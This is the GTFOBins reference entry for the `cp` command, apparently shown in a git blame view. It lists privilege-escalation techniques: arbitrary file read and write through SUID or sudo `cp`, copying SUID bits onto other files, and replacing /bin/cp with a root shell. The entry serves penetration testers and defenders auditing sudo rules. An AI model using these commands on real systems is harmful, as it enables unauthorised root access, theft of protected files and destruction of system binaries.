GTFOBins.github.io/_gtfobins/cp.md

40 lines
1.7 KiB
Markdown
Raw Normal View History

2018-09-03 22:33:24 +02:00
---
functions:
2020-03-21 19:14:56 +01:00
file-read:
2018-09-03 22:33:24 +02:00
- code: |
2020-03-21 19:14:56 +01:00
LFILE=file_to_read
cp "$LFILE" /dev/stdout
file-write:
- code: |
LFILE=file_to_write
echo "DATA" | cp /dev/stdin "$LFILE"
2020-03-21 19:14:56 +01:00
suid:
- code: |
LFILE=file_to_write
echo "DATA" | ./cp /dev/stdin "$LFILE"
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)
2020-03-21 19:14:56 +01:00
code: |
2018-09-03 22:33:24 +02:00
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./cp $TF $LFILE
2021-06-04 14:02:15 +02:00
- description: This can copy SUID permissions from any SUID binary (e.g., `cp` itself) to another.
code: |
LFILE=file_to_change
./cp --attributes-only --preserve=all ./cp "$LFILE"
2018-10-05 19:55:38 +02:00
sudo:
- code: |
LFILE=file_to_write
echo "DATA" | sudo cp /dev/stdin "$LFILE"
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)
2020-03-21 19:14:56 +01:00
code: |
2018-09-03 22:33:24 +02:00
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
sudo cp $TF $LFILE
2021-07-15 14:22:46 +02:00
- description: This overrides `cp` itself with a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `cp` by path. Warning, this is a destructive action.
code: |
sudo cp /bin/sh /bin/cp
sudo cp
2018-09-03 22:33:24 +02:00
---